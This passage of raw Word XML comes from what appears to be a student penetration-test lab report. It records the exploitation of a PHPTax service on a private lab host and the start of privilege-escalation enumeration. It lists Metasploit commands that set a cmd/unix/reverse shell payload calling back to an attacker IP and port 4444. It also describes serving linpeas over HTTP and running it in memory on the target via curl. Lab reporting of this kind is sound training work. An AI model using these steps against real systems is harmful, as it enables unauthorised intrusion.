          <w:p w14:paraId="61E46533" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="120B495F" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="560A6DF1" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="6928ABBD" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="58514ECB" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="4248B97B" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="7B00878F" w14:textId="77777777" w:rsidR="00625478" w:rsidRDefault="00625478" w:rsidP="00625478"/>
          <w:p w14:paraId="42452DC7" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="00625478"/>
          <w:p w14:paraId="108E1655" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="00625478"/>
          <w:p w14:paraId="44F40819" w14:textId="20419F6F" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="00625478">
            <w:r>
              <w:t>More information about the vulnerability can be found here:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CB9CA5D" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRPr="002A5519" w:rsidRDefault="00361C0C" w:rsidP="00625478"/>
          <w:p w14:paraId="0FC237FC" w14:textId="28EA7A1E" w:rsidR="00361C0C" w:rsidRDefault="00000000" w:rsidP="002A5519">
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r w:rsidR="00361C0C" w:rsidRPr="002317E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://www.exploit-db.com/exploits/21665</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7C99F5EF" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="002A5519"/>
          <w:p w14:paraId="0563F750" w14:textId="29122280" w:rsidR="00361C0C" w:rsidRDefault="00000000" w:rsidP="002A5519">
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidR="00361C0C" w:rsidRPr="002317E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.103582</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1E46D6E1" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="002A5519"/>
          <w:p w14:paraId="6CB5B9F6" w14:textId="714DAC70" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="002A5519">
            <w:r>
              <w:t xml:space="preserve">The vulnerability has a CVSS score of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>9.7</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="03102BEC" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="002A5519"/>
          <w:p w14:paraId="05DD73F9" w14:textId="4EDA0B8F" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1079ED5D" w14:textId="0390A891" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A22FAD8" w14:textId="03F22EA2" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc85467576"/>
      <w:r w:rsidRPr="002A5519">
        <w:t>Exploitation Stage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="5AFE0DE7" w14:textId="7241C91D" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the process to exploit the detected service, along with the major steps used so that a skilled reader would be able to re-create your attack. Be sure to list the user account you have compromised in this stag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7"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5519" w14:paraId="3567A917" w14:textId="77777777" w:rsidTr="002A5519">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="652382DB" w14:textId="77777777" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519"/>
          <w:p w14:paraId="6337A5F6" w14:textId="26B5AAC6" w:rsidR="002A5519" w:rsidRDefault="00361C0C" w:rsidP="002A5519">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00361C0C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>From Metasploit:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC7AD0C" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="002A5519">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41ECD755" w14:textId="5E3ACC1B" w:rsidR="00361C0C" w:rsidRPr="002937A4" w:rsidRDefault="0031029B" w:rsidP="002A5519">
            <w:r>
              <w:t>Firstly,</w:t>
            </w:r>
            <w:r w:rsidR="002937A4">
              <w:t xml:space="preserve"> I had to find and select the exploit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20E6E1D7" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A9A0798" w14:textId="2DB17561" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="002A5519">
            <w:r>
              <w:t>Commands:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31914930" w14:textId="77777777" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="002A5519"/>
          <w:p w14:paraId="46847039" w14:textId="42221BCC" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="002A5519">
            <w:r>
              <w:t xml:space="preserve">search </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>phptax</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="229C5F9C" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002937A4">
            <w:r>
              <w:t>use 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23878F97" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="71F4B7F5" w14:textId="76C1473B" w:rsidR="00361C0C" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r w:rsidRPr="00361C0C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1978BF22" wp14:editId="2E128364">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>14816</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>192828</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="6320155" cy="1105535"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="0"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21215"/>
                      <wp:lineTo x="21550" y="21215"/>
                      <wp:lineTo x="21550" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="9811236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1123668" name="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0155" cy="1105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4E06DF" w14:textId="24A55BD9" w:rsidR="00361C0C" w:rsidRDefault="00361C0C" w:rsidP="002A5519"/>
          <w:p w14:paraId="04C02BAE" w14:textId="77777777" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519"/>
          <w:p w14:paraId="55BB5430" w14:textId="75C5AE46" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t>Then I had to configure it to work against the target</w:t>
            </w:r>
            <w:r w:rsidR="0031029B">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="084BB777" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="36FCC725" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="6E3C01F1" w14:textId="35C2D63D" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t>Commands:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E4E76D1" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="1D028280" w14:textId="01FA5DCB" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t>Options</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5766711B" w14:textId="3ED00941" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t xml:space="preserve">Set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rhosts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 192.168.138.130</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68D3812D" w14:textId="4B686DB5" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t xml:space="preserve">Set payload </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>unix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>reverse</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0A7FA717" w14:textId="2FC108A1" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t xml:space="preserve">Set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 192.168.138.128</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BA31EA3" w14:textId="3AF0B926" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t xml:space="preserve">Set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>4444</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1ADDEB0A" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="521A24B8" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="16FB96A1" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="24B4E52D" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="12319B41" w14:textId="5FB107B1" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r w:rsidRPr="002937A4">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="42AF5A54" wp14:editId="596147F2">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>116629</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>61807</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="2979028" cy="2789767"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21389"/>
                      <wp:lineTo x="21411" y="21389"/>
                      <wp:lineTo x="21411" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="17437827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3782701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9028" cy="2789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3B84B87" w14:textId="46DD53B5" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="207EC84B" w14:textId="475FA63B" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="556E85B9" w14:textId="1736445D" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="679ADAC0" w14:textId="1140029D" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="7C237454" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="70D2EF58" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="78AD7662" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="681425B8" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="2ECEC868" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="4C807CC1" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="1FFD4D4D" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="22F33A91" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="35BBC6E7" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="5F7022BD" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="2CE4011D" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="4B976073" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="29602F42" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="62D7320B" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="63305A1D" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="10B1CC0B" w14:textId="6BF94496" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t>Once the exploit was configured, I then ran it (I had to run it twice as it failed the first time).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4281D1E6" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="7D9B30BC" w14:textId="04A9E7BE" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t>Commands:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05A5B129" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="10386EA2" w14:textId="33810D63" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t>Run</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="606BD23D" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="78E166DC" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="385D5110" w14:textId="2DB0E172" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:t xml:space="preserve">Once the exploit had completed, I had access as the www-data </w:t>
            </w:r>
            <w:r w:rsidR="0031029B">
              <w:t>user.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B6AF367" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="35055270" w14:textId="5F74DBDE" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="147DAD30" w14:textId="2123CB63" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="256B6ADC" wp14:editId="72EF1764">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>27093</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>53129</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="3496310" cy="2851150"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="6350"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21504"/>
                      <wp:lineTo x="21537" y="21504"/>
                      <wp:lineTo x="21537" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="846741684" name="Picture 3" descr="A computer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741684" name="Picture 3" descr="A computer screen shot of a computer program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6310" cy="2851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945790E" w14:textId="40246C9A" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="5367DE5E" w14:textId="1C78244E" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="434A412A" w14:textId="4BE4A0E5" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="70093C87" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="6CB40477" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="43992BE6" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="3DE9C926" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="5E413E12" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="2CB402F9" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="67C81289" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="0B832068" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="5F4BCBB6" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="334E51A6" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="18774198" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="7BA32F60" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="07910BBC" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="4C297A60" w14:textId="77777777" w:rsidR="002937A4" w:rsidRDefault="002937A4" w:rsidP="002A5519"/>
          <w:p w14:paraId="1BC37B8E" w14:textId="673F5C2E" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67D22A90" w14:textId="5C2E5A37" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706F9295" w14:textId="753E527A" w:rsidR="005D1FD4" w:rsidRDefault="005D1FD4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="22B787"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C012D7" w14:textId="25939D52" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc85467577"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Privilege Escalation Enumeration Stage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="509FA409" w14:textId="21BEFD7F" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Detail the tools and proces</w:t>
      </w:r>
      <w:r w:rsidR="005D1FD4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>se</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">s you used to scan the system for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">opportunities to escalate from your compromised user to the root user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7"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5519" w14:paraId="42FE400D" w14:textId="77777777" w:rsidTr="002A5519">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DDC2251" w14:textId="77777777" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85"/>
          <w:p w14:paraId="0CC3A7B9" w14:textId="6B925BF0" w:rsidR="002A5519" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:t>Once I had an initial foothold, I then decided to run an automated enumeration script</w:t>
            </w:r>
            <w:r w:rsidR="0031029B">
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0031029B">
              <w:t>linpeas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0031029B">
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> on the target to assess if any privilege escalation vectors were present. I hosted this on my local machine using a web server and was able to access and execute it in memory on the target using curl.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CF32480" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="467FF2EF" w14:textId="34EC894F" w:rsidR="00F3791A" w:rsidRPr="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Setting up the web server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB5A3C8" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="470F36C6" w14:textId="58E505C0" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:t>Commands:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03D69825" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="7E8934BF" w14:textId="70722E6D" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:t xml:space="preserve">Python3 -m </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>http.server</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 8000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="358F3A7F" w14:textId="75F20891" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="405FC76B" w14:textId="613F9025" w:rsidR="00F3791A" w:rsidRPr="002A5519" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B7C7089" wp14:editId="1689E7D6">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>1905</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>36830</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4258310" cy="1464945"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="1905"/>
